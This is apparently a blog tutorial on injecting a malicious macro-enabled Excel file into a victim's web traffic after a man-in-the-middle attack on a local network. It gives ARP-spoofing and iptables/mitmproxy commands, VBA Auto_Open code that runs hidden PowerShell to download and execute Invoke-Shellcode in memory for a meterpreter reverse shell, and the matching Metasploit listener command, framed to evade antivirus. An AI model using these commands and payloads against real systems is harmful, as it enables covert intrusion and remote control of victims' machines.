Malicious File Injection Technique

The idea with this particular attack is to inject a malicious file into the victim’s packet stream when they visit a non-https webpage.  For example, the default website for Internet Explorer is So, when the victim opens their web browser, we can (after a successful MiTM attack) inject our malicious file in hopes that they will run it.

Local LAN attack box: (Kali Linux)
Local LAN victim: (Windows 7 with IE 11, fully patched)
Public AWS server:
Internal AWS LAN IP:

Ideally, we want to remain undetected by  AV, so we’ve embedded our malicious code with a macro-enabled Excel document.  If/When the victim runs the file and clicks to enable macros when prompted, a Powershell command is executed that downloads Invoke-Shellcode (written by Matt Graber) and runs it entirely within memory so as to continue to remain undetected by AV.

First, we need to craft our malicious Excel document.  This is covered in a separate post, but the basic VBA code looks like this:

Private Sub Auto_Open()
strCommand = “powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘ ‘);invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 8443”
Set WshShell = CreateObject(“WScript.Shell”)
Set WshShellExec = WshShell.Exec(strCommand)
End Sub

We also need a place to host our malicious file, which we’ve is seen below:


Next, we setup our metasploit listener, which is being done on an AWS box:

./msfconsole -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST; set PORT 8443; run”


AWS NAT rules to forward incoming 8443 traffic:


We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:


After running the following three commands on our local attack box, we’ll have successfully implemented our MiTM attack:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP

Below is what we’ll see, on our local attack box:


If we look again at the victim PC, we can see the change to the ARP tables:


Once the MiTM attack is fully in place, we can now execute the following two commands on our local attack box to proxy all traffic on port  80 to port 8080:

iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080

./mitmproxy -T -s “”

The first argument runs mitmproxy in transparent proxy mode so that we can view incoming traffic on port 8080.  The second argument runs a script that injects our macro-enabled Excel document into the victim’s web browser, hosted at AWS.


When the victim visits any non-http site (like, they should see something similar within their browser:


Within the mitmproxy console, we should see the injection:


When the file is opened by the victim, we should (hopefully) have our reverse shell.  Even when the victim closes Excel, the shell should persist.





2 thoughts on “Malicious File Injection Technique

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s